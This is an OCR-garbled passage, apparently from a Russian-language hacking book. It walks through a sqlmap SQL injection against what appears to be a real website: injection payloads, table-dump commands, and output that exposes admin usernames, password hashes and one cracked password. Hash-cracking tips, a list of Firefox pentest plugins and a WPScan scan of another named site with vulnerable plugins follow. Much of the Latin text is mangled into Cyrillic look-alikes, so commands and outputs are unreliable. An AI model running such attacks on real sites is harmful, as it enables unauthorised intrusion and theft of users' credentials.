[19:57:42] [ІІМРО] гезитесі: 5 

3| 

[19:57:42] [ІМРО] гезитесі: ісі 

4| 

[19:57:42] [ІІМРО] гезитесі: іпР(2) 

51 

[19:57:42] [ІІМРО] гезитесі: Іо§іп 

6| 

[19:57:42] [ІІМРО] гезитесі: ѵ 

71 

[19:57:42] [ІІМРО] гезитесі: Ріезіо 

81 

[19:57:42] [ІІМРО] гезитесі: ѵагсРіаг(32) 

91 

[19:57:42] [ІІМРО] гезитесі: ітепо 

10 


[19:57:42] [ІІМРО] гезитесі: ѵагсРіаг(20) 

11 


[19:57:42] [ІІМРО] гезитесі: зРиреп 

12 


[19:57:42] [ІІМРО] гезитесі: іпР(1) 

13 


РаРаІэазе: Іатіпаі 

14 


ТаЫе: асітіп 

15 


[5 соіитпз] 

16 


+ - + - + 

17 


| Соіитп | Туре | 

18 


+ - + - + 

19 


| Ріезіо | ѵагсРіаг(32) | 

20 


ГМ 

4-> 

С. 

ТЗ 

21 


| ітепо | ѵагсРіаг(20) | 

22 


1 Іо§іп | ѵ | 

23 


| зРиреп | іпР(1) | 

24 


+ - + - + 
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[19:57:40] [ТМРО] іезііпд соппесііоп го іЬе іагдеі ІІВІ_ 

здітар ісіепііііесі іЬе іоііоѵѵіпд іпіесііоп роіпіз міііі а іоіаі оі 0 НТТР(з) гедиезіз: 

Ріасе: СЕТ 
Рагатеіег: ісі 

Туре: Ьооіѳап-Ьазесі Ыіпсі 

Тіііе: АМР Ьооіеап-Ьазѳсі Ыіпсі - Ѵі/НЕВЕ ог НАѴІШ сіаизе 
Рауіоасі: іс!=24' АШ 3045=3045 АШ 'СуОг'='СуОг 

Туре: АШ/ОВ ііте-Ьазес! Ыіпсі 

Тіііе: Му5(]І_ > 5.0.11 АШ ііте-Ьазес! Ыіпсі 

Рауіоасі: ісІ=24' АШ 5[_ЕЕР(5) АШ 'сѴйЕ 1 = 'сѴОЕ 

[19:57:42] [ІШО] іНе Ьаск-епсІ йВМЗ із Му50І_ 

ѵуѳЬ зегѵег орегаііпд зузіет: 1_іпих Сепіоо 
меЬ арріісаііоп іесЬпоІоду: Nдіпx, РНР 5.3.29 
Ьаск-епсІ ЭВМЗ: Му5()1_ 5.0.11 

[19:57:42] [ІШО] ТеісЬіпд соіитпз Тог іаЬІе 'асітіп 1 іп сІаіаЬазе 'Іатіпаі' 

[19:57:42] [ІШО] гезитесі: 5 

[19:57:42] [ІШО] гезитесі: ісі 

[19:57:42] [ІШО] гезитесі: іпі(2) 

[19:57:42] [ІШО] гезитесі: Іодіп 

[19:57:42] [ІШО] гезитесі: ѵ 

[19:57:42] [ІШО] гезитесі: Ьезіо 

[19:57:42] [ІЫРО] гезитесі: ѵагсЬаг(32) 

[19:57:42] [INРО] гезитесі: ]тепо 

[19:57:42] [ІШО] гезитесі: ѵагсЬаг(20) 

[19:57:42] [ІШО] гезитесі: зіиреп 

[19:57:42] [ІМРО] гезитесі: іпі(1) 

ОаіаЬазе: Іатіпаі 
ТаЫе: асітіп 
[5 соіитпз] 


Соіитп 

і 

Туре 

Ьезіо 

і 

ѵагсЬаг(32) 

ісі 

і 

тс (2) 

] тепо 

і 

ѵагсЬаг(20) 

Іодіп 

і 

V 

зіиреп 


ІПІ(1) 





[19:57:42] [ІШО] ТеісЬесІ сіаіа Іоддесі іо іехі Тііез ипсіег ' /из г/зЬаге/здІтар/оиіриі/млм.Іатіпаі .пате ' 

[*] зЬиіііпд сіомп аі 19:57:42 
:~# | 


АГА! Это точно то, что мы ищем. Если вы не поняли причин моей радости, то 
небольшой урок лингвистики: 

«Гіезіо» — на чешском означает «пароль» 

«зіиреп» — на чешском означает «степень» 

А «Іо§іп» означает на чешском «логин». 

Т.е. в этой таблице есть имя пользователя и пароль. 


Шаг 5: С помощью 5СЦ.МАР 5СЦ-инъекции построим список 
пользователей из целевого столбца выбранной базы данных 


5ЩМАР 5Щ-инъекция делает это простым! Просто снова выполните команду: 


1 


зцітар -и \л/\л/\л/.5ЦІсІиттуѵѵеЬ5і1:е.пате/гиЬгіка.рІір?ісІ=31 -Р Іатіпаі: -Т асітіп -сіитр 
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[20:00:28] [ІМРО] іеісЬіпд соіитпз "Гог іаЬІе ' асітіп' іп сіаіаЬазе Чатіпаі' 

[20:00:28] [ІМРО] гезитесі: 5 
[20:00:28] [ІЫРО] гезитесі: ±6 
[20:00:28] [ІМРО] гезитесі: Іодіп 
[20:00:28] [ІМРО] гезитесі: Ьезіо 
[20:00:28] [ІМРО] гезитесі: ітепо 
[20:00:28] [ІМРО] гезитесі: зіиреп 

[20:00:28] [ІМРО] іеісЬіпд епігіез -Гог іаЬІе 1 асітіп 1 іп сіаііаЬазе Чатіпаі:' 

[20:00:28] [ІМРО] іеісЬіпд питЬег оТ епігіез Тог іаЬІе 'асітіп' іп сіаііаЬазе Чатіпаі:' 

[20:00:28] [ІМРО] гезитесі: 2 

[20:00:28] [ІМРО] гезитесі: 493сссісаЬ464сіі215467сі4с62а7і142 

[20:00:28] [ІМРО] гезитесі: 1 

[20:00:28] [ІМРО] гезитесі: МПа 

[20:00:28] [ІМРО] гезитесі: іисек 

[20:00:28] [ІМРО] гезитесі: 1 

[20:00:28] [ІМРО] гезитесі: с!41сІ8ссІ98іѲ0Ь204е980Ѳ998есі8427е 

[20:00:28] [ІМРО] гезитесі: 4 

[20:00:28] [ІМРО] гезитесі: АсітіпІ5іг?іог 

[20:00:28] [ІМРО] гезитесі: асітіп 

[20:00:28] [ІМРО] гезитесі: 1 

[20:00:28] [ІМРО] апаіугіпд іаЬІе сіитр "Гог роззіЬІе раззу/огсі ЬазЬез 
[20:00:28] [ІМРО] гесодпігесі роззіЬІе раззілюгсі ЬазЬез іп соіитп 'Ьезіо' 

сіо уои мапі іо зіоге ЬазЬез іо а іетрогагу іііе іог еѵепіиаі іигіЬег ргосеззіпд мііЬ оіЬег іооіз [у/М] п 
сіо уои мапі іо сгаск іЬет ѵіа а сіісііопагу-Ьазесі аііаск? [У/п/я] у 

[20:00:41] [ІМРО] изіпд ЬазЬ теіЬосі 'тсі5_депегіс_раззѵл/сі' 

[20:00:41] [ІМРО] гезитіпд раззмогсі 'пиѵоіагі' іог ЬазЬ '493сссісаЬ4б4сІі215467с14с62а7і142' 

мЬаі сіісііопагу (іо уои мапі іо изе? 

[1] сіеіаиіі (іісііопагу іііе '/изг/зііаге/здітар/іхі/могсііізі. гір' (ргезз Епіег) 

[2] сизіот сіісііопагу іііе 

[3] іііе мііЬ Іізі оі сіісііопагу іііез 
> 1 

[20:00:45] [ІМРО] изіпд сіеіаиіі сіісііопагу 

сіо уои мапі іо изе соттоп раззмогсі зиіііхез? (зіом!) [у/М] п 

[20:00:49] [ІМРО] зіагііпд сіісііопагу-Ьазесі сгаскіпд (тсі5_депегіс_ра55ѵ</с1) 

[20:01:05] [ІМРО] розіргосеззіпд іаЬІе сіитр 

ОаіаЬазе: Іатіпаі 
ТаЫе: асітіп 
[2 епігіез] 


ісі 

| ]тепо 

і 

Ьезіо 

і 

Іодіп 

і 

зіиреп 

1 

| М?1а 

і 

493сссісаЬ464сіі215467сІ4с62а7і142 (пиѵоіагі) 


іисек 


1 

4 

| Асітіпізі г?іог 

і 

Ь41сі8ссі98і00Ь2Ѳ4е98Ѳ0998есі8427е 


асітіп 

і 

1 










[20:01:05] [ІМРО] іаЬІе Чатіпаі .асітіп' сіитресі іо СБѴ іііе '/изг/зЬаге/здІтар/оиіриі/ммм.Іатіпаі . пате/сіитр/іатіпаі/асітіп. сзѵ' 
[20:01:05] [ІМРО] іеісЬесі сіаіа Іоддесі іо іехі іііез ипсіег ' /из г/зЬаге/здІтар/оиіриі/ммѵу.Іатіпаі .пате ' 


Это командой мы получим полный дамп таблицы. Но если, например, таблица 
большая, и эксплуатируется слепая инъекция, то, для экономии времени можно 
модифицировать команду: 


1 


зцітар -и \л/\л/\л/.5ЦІсіиттуѵѵеЬ5і1:е. пате/ гиЬгіка.рГір?ісі=31 -й Іатіпаі: -Т асітіп -С Іо§іп — 
сіитр 


Мы получим список пользователей. 


Почти закончили, теперь нам нужны пароли к этим пользователям. Следующим шагом 
мы их получим. 


Шаг 6: С помощью 5СЩѴІАР 5СН.-инъекции извлекаем пароли из целевого 
столбца таблицы выбранной базы данных 


Думаю, вы уже поняли какая команда будет следующей. Что ж, приступим: 


1 


зцітар -и ѵѵѵѵѵѵ.$цІсіитту\/ѵеЬ5і1:е.пате/гиЬгіка.рІір?ісі=31 -й Іатіпаі: -Т асітіп -С Ьезіо — 
сіитр 


ТАДА!! У нас есть пароль. 


Но постойте, этот пароль выглядит забавно. Это не может быть чьим-то паролем. Кто- 
то, кто оставил подобную уязвимость в своём веб-сайте просто не может иметь пароль 
вроде этого. 


Именно так и есть. Это хэш пароля. Это означает, что пароль зашифрован и сейчас нам 
нужно расшифровать его. 
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На самом деле, по-большому счёту, программа зцітар сама всё сделает за нас. 

Найдя пароли, она спросит, до уои ѵѵапі іо зіоге ЬазЬез іо а іетрогагу /Не /ог еѵепіиаі 
/игікіег ргосеззіпд і л/іііі оіЬег іооіз, т. е. хотим ли мы сохранить хэши во временный файл, 
чтобы в дальнейшем обрабатывать их. Это на ваше усмотрение. 

Теперь программа говорит до уои ѵѵапі іо стек іНет ѵіо о дісііопагу-Ьазед аііаск?, что 
означает, хотите ли вы использовать атаку, основанную на словаре. Это сэкономит 
уйму времени, поэтому если вы просто учитесь, пробуете, то соглашаемся. 

Нам снова даются три опции: 

[1] де/аиіі діеііопогу /Не ’/изг/зЬаге/зрІтар/іхі/ѵѵогдІізі.гір' (рге 55 Епіег) (словарь по 
умолчанию — просто нажмите Епіег) 

[2] сивіот діеііопагу /Не (файл пользовательского словаря) 

[3] /Не ѵѵіііі Іізі о/ діеііопагу /Нез (файл со списком пользовательских словарей) 

Просто нажмите Епіег. 

На и, наконец, программа спрашивает до уои ѵѵапі іо изе соттоп раззѵѵогд 5 и//іхез? 
(зіоѵѵ!). Это означает, хотим ли мы использовать обычные префиксы. Я отвечаю нет, 
поскольку это очень долгая процедура. А конкретно этот сайт мне интересен только как 
пример урока. Узнаю я от него пароль или нет — мне всё равно. Я не готов 
тратить много времени на эту процедуру: 


1| 

сіо уои ѵѵапі іо зіоге НазНез іо а іетрогагу іііе іог еѵепіиаі іигіііег ргосеззіп§ ѵѵіііі оіііег 
ІООІЗ [у/ІМ] П 

21 

сіо уои ѵѵапі іо сгаск іііет ѵіа а сІісііопагу-ЬазесІ аііаск? [Ѵ/п/ц] у 

3| 

[20:00:41] [ІІМРО] и5Іп§ ііазіі теіЬосі 'тс^5_§епе^іс_ра55ѵѵс^ , 

4| 

[20:00:41] [ІІМРО] ге5итіп§ раззѵѵогсі ’пиѵоіагі' іог НазН 

'493сссІсаЬ464сіі215467сІ4с62а7і142' 

51 

ѵѵііаі сіісііопагу сіо уои ѵѵапі іо изе? 

6| 

[1] сІеТаиІі сіісііопагу ТМе '/изг/зНаге/зцІтар/іхі/ѵѵогсІІізі.гір' (ргезз Епіег) 

71 

[2] сизіот сіісііопагу іііе 

81 

[3] іііе ѵѵіііі Іізі оі сіісііопагу іііез 

91 

> 1 

10 


[20:00:45] [ІІМРО] изіп§ сіеіаиіі сіісііопагу 

11 


сіо уои ѵѵапі іо изе соттоп раззѵѵогсі зиіііхез? (зіоѵѵ!) [у/і\І] п 

12 


[20:00:49] [ІІМРО] зіагііп§ сіісііопагу-ЬазесІ сгаскіп§ (тсІ5_§епегіс_ра55ѵѵсІ) 

13 


[20:01:05] [ІІМРО] розіргосеззіп§ іаЫесІитр 

14 


ОаіаЬазе: Іатіпаі 

15 


ТаЫе: асітіп 

16 


[2 епігіез] 

17 


+—+-+-+-+-+ 

18 


| ісі | ]тепо | Незіо | Іо§іп | зіиреп | 

19 


+—+-+-+-+-+ 
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201 

| 1 | М?1а | 493сссісаЬ464сГГ215467с)4с62а7Г142 (пиѵоіагі) | Гисек | 1 | 

211 

| 4 | АсІтіпІ5І:г?1:ог | сІ41сІ8ссІ98Г00Ь204е9800998есГ8427е | асітіп | 1 | 

221 

+—+-+-+-+-+ 


Не смотря на выбор «быстрых» опций, пароль расшифрован! 


В этот раз всё получилось быстро и непринуждённо. Иногда бывает ещё проще — 
пароль не зашифрован. Иногда пароль не удаётся расшифровать быстрым способом. 
На этот случай у меня есть одна хитрость — я копирую хэш пароля и... ищу в Гугле. 
Примерно в половине случаев мне везёт — находятся тематические сайты, базы 
данных, в которых собраны расшифрованные хэши. 

Давайте представим ситуацию, когда быстро пароль не подобрался, когда поиск по 
Гуглу и сайтам с радужными таблицами 

( Ні;1;р5://ги.\л/ікіресІіа.ог§/\л/ікі/Радужная_таблица ) не увенчался успехом, и это «не 
учебная тревога», т. е. вас интересует конкретный сайт и для вас важно знать для него 
пароль, то можно попытаться воспользоваться специальным программным 
обеспечением. 

К расшифровке паролей я ещё вернусть, это будет большая статья, охватывающая 
взлом ІѴЮ5, рГірВВ, Му5Щ и 5НА1 паролей с помощью НазГіса* на Каіі. Не пропустите 
её. 

Заключение 

Есть много других способов проникнуть в базу данных или получить пользовательскую 
информацию. Вам следует использовать эти техники только на веб-сайтах, которые 
дали вам на этой разрешение. 

Пока писал статью, какой-то чудак «хакнул» это несчастный сайт — ничего не удалил, 
просто дефейснул его. Друзья, давайте учиться, пробовать, думать, изучать программы, 
искать обходные пути, нестандартные решения, постигать глубины сетевых технологий, 
заглядывать туда, куда другие не могут, но давайте не будем заниматься мелкими 
пакостями! 

Глава 36. Хакерские плагины для ГігеТох 

Подобная подборка для Соо§1е СНготе в статье " Хакерские плагины для СНготе ". 

Подборка плагинов для тестировщиков на проникновение подсмотренная в Роіо . 
Знакомство с будущими целями нередко начинается в браузере. Глядя на сайт в окне 
браузера можно предположить используемый движок, можно попробовать 
повставлять кавычки и т. д. 

Кроме этого, браузер может стать полноценным инструментом пентестера, не только 
помочь в просмотре сайта, но и выполнить разведку или даже успешную атаку на сайт. 

Ниже перечислены плагины, которые придуться очень кстати для веб-местеров, 
тестеров на проникновение, а также всех, кто интересуется вопросами безопасности 
веб-приложений. 

Все плагины я искал прямо в браузере (Дополнение -> Получить расширения). Но с 
некоторыми возникли проблемы: 2 плагина не были найдены по ключевым словам (у 
меня бета-версия Ріге^ох), хотя они и присутствуют в официальном репозитории 
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плагинов Рі ге^ох — их можно скачать со страницы плагина, ссылка на которую дана. 
При этом такие плагины имеют статус «подписаны». Один же плагин отсутствует в 
официальном рипозитории, поэтому его необходимо ставить с сайта разработчика. 

0. Включение панели меню в РігеТох 

Вот вы сейчас, наверное, будете надомной смеяться, а я действительно потратил много 
времени, чтобы найти, куда я поуста на вливал эти все расширения и как их 
запустить/отобразить (я пользователь Сбготе ещё с того времени, когда он был в бета- 
версии и когда о нём никто не знал почти). 

Нам нужно включить панель меню. Для этого нужно навести курсор на верхнюю 
строчку Рігеіюх, нажать правую кнопку и выбрать «Панель меню». Наши установленные 
плагины будут появляться в пункте меню «Инструменты». 

1. Соокіез Мапа§ег+ 

Соокіез Мапа§ег позволяет просматривать, редактировать и создавать кукиз, а также 
редактировать множество кукиз за раз и делать их резервные коп и и/восста на вливать. 
Это расширение изначально основывается на устаревшем (и, возможно, покинутом) 
Абб N ЕсМТ Соокіез ѵ0.2.1.3 от §ооб\л/іІІ. 

Новое в этой ветке по сравнению с оригинальной АсІсІ N ЕсМТ Соокіез: 

• полная замена встроенного просмотрщика куки (опционально) 

• возможность изменения домена, пути и имени куки 

• возможность редактировать множество кукиз за раз 

• возможность сохранять новое куки или заменить оригинальное куки когда 
изменён домен, путь или имя 

• опция для автоматического мониторинга изменения кукиз и обновления 
информации в окне 

• опция для фильтрации авто применения во время набора текста 

• настройка какого рода информации из куки вы хотите видеть, изменение 
порядка, показать/спрятать поля и колонки 

• экспорт информации куки в буфер обмена или в файл с использованием 
настраиваемых шаблонов 

• резервное копирование/восстановление всех или только отобранных кукиз. 

• возможность вручную изменять дату истечения напрямую в поля "ехріге", 
больше не нужно выбирать "пеѵѵ баіе" 

• окно "Абб соокіе" автоматически заполняет поля домен и путь, основываясь на 
выбранной куки (если такая есть) 

• а также с десяток других изменений 

2. РігеЬи§ 

Официальное описание на русском: 

РігеЬи§ интегрируется в Рігеіюх для того, чтобы принести изобилие средств разработки 
на кончики Ваших пальцев, в то время как Вы путешествуете по сети. Вы можете 
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редактировать, выполнять отладку и просматривать С55, НТМІ. и ^ѵаБсгір* в режиме 
реального времени на любой странице в сети... 

3. ММЗ-РгохуБѵѵіІсН 

Переключение между прямым интернет соединением и несколькими настройками 
прокси. 

С Ргоху БѵѵіІхЬ вы можете переключаться между прямым соединением в Интернет и 
другими прокси настройками в один клик. 

После установки нажмите правой кнопкой мыши на панель инструментов или 
навигационную панель — как она там теперь называется, нажмите «Редактировать» и 
перетащите символ ММ3 на панель инструментов. 

4. Беіепіит ЮЕ 

Беіепіит ЮЕ — это интегрированная среда разработчика для скриптов Беіепіит. Она 
реализована как расширение Рігеіюх и позволяет вам записывать, редактировать и 
отлаживать тесты. Беіепіит ЮЕ включает целое Беіепіит Соге, позволяющее легко и 
быстро записывать и воспроизводить тесты в текущем окружении, котором они и будут 
запускаться. 

Беіепіит ЮЕ — это не только инструмент записи, это настоящая ЮЕ. Вы можете 
выбрать использовать её для функций записи, а можете редактировать вручную ваши 
собственные скрипты. С функциями автодополнения и удобной навигацией по 
командам, Беіепіит ЮЕ — это идеальное окружение для создания тестов Беіепіит, не 
важно какого рода тесты вы предпочитаете. 

Для установки перейдите на страницу НіТрУ/сІосз.зеІепіитНд.огя/сІоѵѵпІоасІ/, найдите 
там секцию Беіепіит ЮЕ (это непросто!), скачайте расширение для Рігеіюх и установите 
его. 

Также установите расширения: 

• Беіепіит ЮЕ ВиМоп 

• Беіепіит ЮЕ — БеІВІоскз 

• Беіепіит ЮЕ: РНР РогтаНегз 

5. БСЦ. Іпіесі Ме 

Это расширение есть в официальном репозитории, но оно не ищется из браузера. 
Адрес расширения: НіТрзУ/асІсІопз.тогіІІа.огй/еп-изАігеІюх/асІсІоп/здІ-іпіесі-те/ . 

Установите его с этой страницы. 

Это расширение для тестирования на уязвимость БЩ-инжект. 

Инструмент работает отправляя ваши формы с подставленными значениями формы, 
которые позволяют выполнить атаку 5Щ_-инжект. 

Инструмент отправляет строки (последовательности символов) через поля формы, а 
затем следит за ответом сервера в поиска сообщений об ошибках от базы данных, 
инструмент сам разбирает НТМІ. страницы. 

6. Татрег йаіа 

Просмотр и модификация заголовков НТТР/НТТР5. Используйте Татрег ОаТа для 
просмотра и модификации заголовков НТТР/НТТР5 и параметров роз*. 
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7. ІІзег А§епІ БѵѵіІсИег 

Добавляет пункт в меню и кнопку в тулбар для переключения пользовательского агента 
браузера. На выбор представлены самые популярные браузеры, либо можно вручную 
прописать характеристики пользовательского агента. 

8. \Л/еЬ йеѵеіорег 

Добавляет меню и тулбар с различными инструментами веб-разработчика. 

9. Х55 Ме 

Также не сумел найти в браузере. Официальная страничка: 
ИНрзУ/асІсІопз.тогіІІа.огй/еп-изДіге^ох/асІсІоп/хБЗ-те 

Межсайтовый скриптинг (Х55) — это распространённая уязвимость в сегодняшних веб¬ 
приложениях. Уязвимость Х55 может стать причиной серьёзного ущерба веб¬ 
приложению. Выявление уязвимостей Х55 на ранних этапах процесса разработки 
поможет защитить веб-приложения он наличия ненужных недостатков. 

Х55-Ме НЕ выявляет уже подложенные Х55 атаки. Инструмент работает следующим 
образом: отправляет через ваши НТМІ. подстановки в поля формы, которые 
представляют Х55 атаки. Если в результате НТМІ. страница выполняет определённый 
]аѵа5сгі рТ код (устанавливается величина сІосшпеп1:.ѵиІпегаЫе=1:гііе), тогда инструмент 
помечает эту страницу как уязвимую к данной строке Х55. 

10. НаскВаг 

Ещё одно расширение, но которое я подсмотрел не в Роіо, а в каком-то видео. 

Этот тулбар помогает вам найти и провести тест на 5Щ_-инжекты. Этоттурбар поможет 
вам протестировать 5Щ.-инъекции, Х55 дыры и безопасность сайта. 

Преимущества: 

• Даже самые сложные адреса (игі) будут читаться 

• Фокус будет держаться на текстовой области, поэтому после выполнения игі 
(СТгІ+ЕпТег) вы можете просто перейти к печатанию/тестированию. 

• игі в текстовой области не подвержено редиректам. 

• Можно использовать как блокнот 

• Полезный инструмент для декодирования на лету ии/игі и прочего. 

• Все функции работают на выделенном в данный момент тексте. 

. Хеширование МР5/5НА1/5НА256 

• Быстрые сочетания клавишь Му5Щ/М5 5Щ. 5егѵег/ОгасІе 

• Полезные функции Х55 

• Ну и многое другое — пробуйте сами. 

Быстрые сочетания клавишь: 

• Загрузить игі ( АІТ + А ) 

• Разделить игі ( АІІ + 5 ) 

• Выполнить ( АІі + X, СЫ + Епіег ) 
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. ІІ\ІТ-1(АІ* — ) 

. ІІЧТ+1(АІІ + ) 

. НЕХ -1 ( СігІ АН - ) 

• НЕХ+1(СігІ + АИ + ) 

• М05На$Ь(АИ + М) 

. Му5Щ СНАК() ( АН + V ) 

• М5 5СН. 5егѵег СНАК() ( АН + Ц) 


Глава 37. Сканируем на уязвимости \Л/огс1Рге5$: \Л/Р5саппег и 
РІесозІ 


Прежде всего, пару предварительных замечаний. На ѴѴеЬѴѴаге.Ыг публикуется 
довольно много информации об уязвимостях, разного рода сканерах этих уязвимостей, 
хакерских программах и т. д. Мы, авторы ѴѴеЬѴѴаге.Ьіг, искренне надеемся, что вы 
используете эти знание во благо: для укрепления защиты сайтов и серверов, для 
выявления потенциальных проблем и их устранения. В любом случае, мы стараемся 
уравновесить общую тематику сайта: в обилии публикуются инструкции по правильной 
настройке и защите серверов, по защите веб-приложений. 

Так и эта статья — информация из неё может быть использована как во благо (для 
выявления уязвимостей и устранения их, так и во зло). Очень надеемся, что вы 
находитесь именно на светлой стороне. 

Работа этих программ рассмотрена в Каіі Ыпих, поэтому, возможно, вас заинтересует 
статья по установке Каіі Ыпих (как в настоящий компьютер, так и в виртуальный). 

\Д/огсІРге55 завоевал заслуженную популярность. Каждый день запускается огромное 
количество новых сайтов на этом движке. Быстрее самого ѴѴогсІРгезз распространяются 
только дыры в скриптах, поскольку эти дыры могут быть не только в коде движка, но и 
в любом из огромного количества его плагинов и даже в темах (!). Именно уязвимости 
в плагинах ѴѴогсІРгезз мы и будем искать в этой статье. 

\Л/огсІРге55 Бесигііу Бсаппег 

Это очень мощный сканер ѴѴогсІРгезз. Главные его достоинства: 

• показывает полный список плагинов и среди них выделяет уязвимые; 


• может проводить сканирование на наличие уязвимых тем; 

• актуальная база; 

• анализирует файл гоЬоіз.Ш; 

• показывает информацию о версии ѴѴогсІРгезз, о текущей теме, об ответах 
сервера и пр. 

Прежде всего, обновим базы. Это делается так (наберите в консоли): 


1 


ѵѵрзсап -ирсіаіе 


Опишу ключи (они все интересные), а затем перейдём к конкретным примерам. 
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Ключи Ѵ\/огс1Рге55 Бесигііу Бсаппег 

— ирсіаіе : обновляет базы. 

— игі или -и <целевой игІ> : ІІЯІ. адрес/домен сайта на ѴѴогсІРгезз для сканирования. 

— Іогсе или -I 7 : принуждает \А/Р5сап не проверять, работает ли удалённый сайт на 
ѴѴогсІРгезз (проще говоря, даже если целевой сайт не на \А/огсІ Ргезз, сканирование всё 
равно продолжается). 

— епитегаіе или -е [опция(опции)] : Перечень (после этого ключа можно использовать 
следующие опции). 

опции : 

и : имена пользователей ісі от 1 до 10 

и[10-20] : имена пользователей ісі от 10 до 20 (вы должны вписать в [] целые 
цифры) 

р : плагины 

ѵр : сканирование только на плагины, про которые известно, что они уязвимые 
ар : все плагины (может занять много времени) 

И : ІітІІіитЬз 
1 : темы 


ѵі : сканирование только на темы, про которые известно, что они уязвимые 

аі : все темы (может занять много времени). 

Можно использовать по несколько ключей, например «-е р,ѵ1» осуществит 

сканирование плагинов и уязвимых тем. Если ключи не заданы, то по умолчанию 
используется следующий набор "ѵ1:,1:1:,и,ѵр". 


Это неполный список ключей, там ещё много интересных, но редко применяемых 
ключей. Своё знакомство вы можете продолжить набрав команду: 


1 


ѵѵрзсап -б 


Пример запуска сканирования: 


1 


ѵѵрзсап -и ѵѵеЬѵѵаге.Ьіі -е р,ѵ{ 


Т.е. сначала набираем слово ѵѵрзсап, затем через пробел ключ -и и через пробел адрес 
веб-сайта. Затем через пробел ключ -е и вписываем через запятую нужные опции (уже 
без тире). 

Я в качестве примера вызова сканирования привёл свой сайт, но покажу результаты 
сканирования для других сайтов (там намного интереснее). 

Например здесь, не только найдена старая версия ѴѴогсІРгезз, но и целый зоопарк 
старых плагинов, среди которых есть и уязвимые: 
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[+] Ѵі/е іоипсі Б ріидіпз: 

] Матѳ: аіі-іп-опе-зео-раск - ѵі.6.13.8 
| 1_осаііоп: НПр ://зеѵепіееп 2 его. ги/іл/р-сопіепі/ріидіпз/аіі -іп-опе-зео-раск/ 

Тіііе: АН іп Опе ЗЕО Раск <=2.1.5 - аіозеор_іипсііопз.рИр пеілг_теіа Рагатеіег Х53 
Веіегепсе: іііірз ://іл/рѵи!псІЬ . сот/ѵиіпегаЬіІіііез/6888 

Веіегепсе: Иіір ://Ыод .зисигі.пеі/2014/Ѳ5/ѵи1пегаЬі1ііу-іоипсі-іп-іііе-аіі -іп-опе-зео-раск-іл/огфгезз-ріидіп .іііті 
Веіегепсе: Иіір ://озѵс!Ь .огд/107640 
] РіхесІ іп: 2.1.6 

Тіііе: АН іп Опе 5Е0 Раск <=2.1.5 - Упзрѳсіііесі Ргіѵііеде Езсаіаііоп 
Веіегепсе: Иіірз ://іл/рѵи!пс1Ь .сот/ѵиіпе гаЬіІіііез/6889 

Веіегепсе: Иіір ://Ыод .зисигі .пеі/2Ѳ14/Ѳ5/ѵи1пегаЬі1ііу-іоипс1-іп-іНе-аП-іп-опе-зео-раск-іл/огфгезз-ріидіп.Ніті 
Веіегепсе: Иіір ://озѵсІЬ .огд/107641 
] РіхесІ іп: 2.1.6 

Тіііе: АН іп Опе 5Е0 Раск <= 2.0.3 - Х53 ѴиІпегаЬіІііу 
Веіегѳпсе: іііірз:/Лі/рѵиІпсІЬ.сот/ѵиіпегаЬіІіііез/6890 

Веіегепсе: Иіір://агсНіѵез.пеоНарзіз. сот/а гсНіѵез/Ьиді гад/2013-10/0006 .Ніті 
Веіегепсе: Иіір://раскеізіогтзесигііу.сот/ііІез/123490/ 

Веіегепсе: Иіір ://ілЛлЛл/.зесигііуіосиз .сот/ЬісІ/62784 
Веіегепсе: Иіір://зес!ізіз.огд/Ьидігад/2013/Осі/8 

Веіегепсе: Иіір ://ѵ«/еЬ .пѵсі .пізі . доѵ/ѵіем/ѵиіп/сіеі аіі ?ѵи!пІсІ=СѴЕ-2013-5988 
Веіегепсе: Иіірз ://зесипіа .сот/асІѵізогіез/ббІЗЗ 
Веіегепсе: Иіір ://озѵс1Ь .огд/98023 
РіхесІ іп: 2.0.3.1 

[ + ] Мате: аиіо-НідНзІісІе 

| І_осаііоп: Иіір://зеѵепіеепгего. ги/іл/р -сопіепі/ріидіпз/аиіо -НідНзІісІе/ 

Мате: ѵ/р-радепаѵі 

| 1_осаііоп: Иіір://зеѵепіееп 2 его. ги/мр-сопіепі/ріидіпз/ѵф-радепаѵі/ 

Мате: ѵф-роііз 

| І_осаііоп: Иіір://5ѳѵепіеепгего. ги/мр-сопіепі/ріидіпз/мр-роііз/ 

[ + ] Мате: мр-зирег-сасНе 

| 1_осаііоп: Иіір://зеѵепіееп 2 его. ги/іл/р-сопіепі/рІидіпз/іѵр-зирег-сасНе/ 

[ + ] Ѵі/е соиісі поі сіеіегтіпе а ѵегзіоп зо аіі ѵиІпегаЬіІіііез аге ргіпіесі оиі 

Тіііе: Ѵі/Р-Зирег-СасИе 1.3 - Ветоіе Сосіе Ехесиііоп 
Веіегепсе: іііірз:/Л\/рѵи1пс1Ь.сот/ѵиіпегаЬіІіііез/6623 

Веіегепсе: Иіір ://млм.асипеііх .сот/ЫодЛ/еЬ-зесигііу-гопе/іл/р-рІидіпз-гетоіе-сосіе-ехесиііоп/ 

Веіегепсе: Ігіір://ѵгагфгезз.огд/зиррогі/іоріс/ріѵпЗс! 


[+] Матѳ: \л/р-зирег-сасНе 

| І_осаііоп: Иіір ://зеѵеп1:ееп2его. ги/ѵ/р-сопіепі/рІидіпзЛі/р-зирег-сасНе/ 

[+] Ѵі/е соиісі поі сіеіегтіпе а ѵегзіоп го аіі ѵиІпегаЬіІіііез аге ргіпіесі оиі 

Тіііе: Ѵі/Р-Зирег-СасИе 1.3 - Ветоіе Сосіе Ехесиііоп 
Веіегепсе: іііірз://\л/рѵи1пс!Ь.сот/ѵиіпегаЬіІіііез/6623 

Веіегепсе: Иіір ://ѵмм. ас ипеііх.сот/Ыод/іл/еЬ-зесигііу-20пе/іл/р-р1идіпз-гетоіе-сосіе-ехесиііоп/ 
Веіегепсе: іііір ://ілюгфгезз .огд/зиррогі/іоріс/рмпЗсІ 

Веіегепсе: Иіір ://Ыод .зисигі.пеі/2013/04/ирс!аіѳ-іл/р-5ирег-сасНе-апс1-ѵ\/Зіс-іттесііаіеіу-гетоіе-сосіе 
[і] РіхесІ іп: 1.3.1 

Тіііе: VI? Зирег Сасііе 1.3 - ігипк/\л/р-сасНе.рИр ѵ»/р_попсе_иг1 Рипсііоп ІШ ХЗЗ 
Веіегепсе: Иіірз ://ѵурѵи1псІЬ .сот/ѵиіпе гаЬіІіііез/6624 

Веіегепсе: Иіір ://ѵіеЬ .пѵсі .пізі .доѵ/ѵіе\л//ѵи!п/сІеіаі1?ѵи1пІсІ=СѴЕ-2013-2008 
Веіегепсе: Иіір://озѵсІЬ.огд/92832 
[і] РіхесІ іп: 1.3.1 

Тіііе: Ѵі/Р Бире г СасИе 1.3 - і гипк/рІидіпз/мріоисН .рИр 1)131 ХЗЗ 
